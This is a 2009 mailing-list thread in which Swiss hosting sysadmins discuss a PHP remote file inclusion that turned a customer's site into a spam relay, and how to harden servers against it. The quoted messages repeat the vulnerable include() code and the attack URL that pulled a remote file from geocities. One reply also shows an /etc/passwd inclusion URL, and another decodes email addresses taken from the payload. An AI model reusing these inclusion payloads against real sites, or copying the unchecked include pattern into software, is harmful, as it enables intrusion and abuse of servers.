Hi all
Just stopped our mail server from spitting out thousands of spam messages.
We have a customer who has a site with the following (stupid) code in his index.php:
if($called_page_link!="") { $requested_file=$called_page_link; }
include($requested_file);
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt?
Boom.
Have I already told you that I hate spammers? :-)
Oh well, one down - a few million to go...
Regards,
Mike
I think, this is what you should have anyway in your php.ini
allow_url_fopen = Off
/Radek Am 19.02.2009 um 16:31 schrieb Mike Kellenberger:
Hi all
Just stopped our mail server from spitting out thousands of spam messages.
We have a customer who has a site with the following (stupid) code in his index.php:
if($called_page_link!="") { $requested_file=$called_page_link; }
include($requested_file);
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt?
Boom.
Have I already told you that I hate spammers? :-)
Oh well, one down - a few million to go...
Regards,
Mike
-- Mike Kellenberger mike.kellenberger@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Mit freundlichen Grüssen
Radek Mrskos Email: mrskos@volume.ch Baechlerstr. 12 Tel: +41 43 534 40 24 CH-8802 Kilchberg Mob: +41 79 219 68 66 PGP:0x8CB69F6D Fax: +41 86079 2196 866
totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-)
Regards,
Mike
Hey Mike
First thing to remember: never get nervous about a spammer! There are too many out there. It's just not worth your time to get angry about such things... It was our choice to get sysadmins - spamfighting is one of our big daily tasks. We might as well work for McDonalds - there's spam too.
Turning off allow_url_fopen & CURL might give you some headaches about customers that definitely need the option to fetch remote data. So here's my recommended setup (allow_url_include was introduced in PHP 5.2.0):
allow_url_fopen = On allow_url_include = Off
This will prevent you from the most stupid spammers, at least. Next, work on some secure PHP setup, say: running PHP as CGI with Apache's SuExec. You should also throttle emails sent by PHP, e.g. with a simple sendmail wrapper: http://www.iezzi.ch/archives/258 http://www.iezzi.ch/archives/217
Regards, Philip
Mike Kellenberger wrote:
totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-)
Actually, this problem is known since ages. I wonder, why you fall into that right now.
But what I really realise is, that this list is populated by Swiss Hosting Sysadmins from all important hosters. But they don't really share their experience and their actual problems. I mean in my old hosting days, I was glad to have some direct connections (for example per IRC), where I just could point out some troubles and solve them quickly.
So Hosting-Sysadmins, please get together and share your mind! This list is very network related and this is good so. Probably an other list would suit better for all hosters.
Cheerz, - Dan
PS: If I still was with a hoster, I would now take care of that. So maybe someone else can take the initiative.
And disable curl module BTW ;)
On Thu, Feb 19, 2009 at 4:41 PM, Radek Mrskos mrskos@volume.ch wrote:
I think, this is what you should have anyway in your php.ini
allow_url_fopen = Off
/Radek
Thats bad coding anyway :
http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd
Regards Gianni
Radek Mrskos schrieb:
I think, this is what you should have anyway in your php.ini
allow_url_fopen = Off
/Radek Am 19.02.2009 um 16:31 schrieb Mike Kellenberger:
Hi all
Just stopped our mail server from spitting out thousands of spam messages.
We have a customer who has a site with the following (stupid) code in his index.php:
if($called_page_link!="") { $requested_file=$called_page_link; }
include($requested_file);
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt?
Boom.
Have I already told you that I hate spammers? :-)
Oh well, one down - a few million to go...
Regards,
Mike
-- Mike Kellenberger mike.kellenberger@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Mit freundlichen Grüssen
Radek Mrskos Email: mrskos@volume.ch Baechlerstr. 12 Tel: +41 43 534 40 24 CH-8802 Kilchberg Mob: +41 79 219 68 66 PGP:0x8CB69F6D Fax: +41 86079 2196 866
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
luckily in this case: it's a windows server...
regards,
mike
luckily in this very single case! :)
On 19.02.2009, at 17:05, Mike Kellenberger wrote:
luckily in this case: it's a windows server...
regards,
mike
-- Mike Kellenberger mike.kellenberger@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork
-----Ursprüngliche Nachricht----- Von: swinog-bounces@lists.swinog.ch [mailto:swinog-bounces@lists.swinog.ch ] Im Auftrag von Gianni Carafa Gesendet: Donnerstag, 19. Februar 2009 17:04 An: swinog@swinog.ch Betreff: Re: [swinog] F*ing Spammers and stupid customer code...
Thats bad coding anyway :
http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd
Regards Gianni
Radek Mrskos schrieb:
I think, this is what you should have anyway in your php.ini
allow_url_fopen = Off
/Radek Am 19.02.2009 um 16:31 schrieb Mike Kellenberger:
Hi all
Just stopped our mail server from spitting out thousands of spam messages.
We have a customer who has a site with the following (stupid) code in his index.php:
if($called_page_link!="") { $requested_file=$called_page_link; }
include($requested_file);
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt?
Boom.
Have I already told you that I hate spammers? :-)
Oh well, one down - a few million to go...
Regards,
Mike
-- Mike Kellenberger mike.kellenberger@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Mit freundlichen Grüssen
Radek Mrskos Email: mrskos@volume.ch Baechlerstr. 12 Tel: +41 43 534 40 24 CH-8802 Kilchberg Mob: +41 79 219 68 66 PGP:0x8CB69F6D Fax: +41 86079 2196 866
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog _______________________________________________ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Mike Kellenberger wrote: [..]
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt?
http://www.hardened-php.net/suhosin/index.html
"If you are not only running your own PHP scripts but are also hosting 3rd party PHP applications for yourself or even for possible customers, then you cannot trust the code quality of the PHP applications you use."
I suggest that you install that to safe yourself from a lot of problems. BTW: letting P
Debian: apt-get install php5-suhosin :)
Also apparently works on Windows.
Btw:
echo "<?php echo base64_decode('YWJ5bmVlZGFyZWFsb3ZlQHlhaG9vLmNvLnVrLHNoYXJuaW5hbUBsaXZlLmNvLnVr'); ?>" | php abyneedarealove@yahoo.co.uk,sharninam@live.co.uk
You might want to get those accounts shut down by contacting their abuse departments.
Next to all that, ratelimiting+alerting and monitoring outbound SMTP from sources you do not fully control is always a great idea.
Greets, Jeroen
-
Daniel Kamm -
Gianni Carafa -
Jeroen Massar -
Mike Kellenberger -
Philip Iezzi -
Radek Mrskos -
Romain Bourdy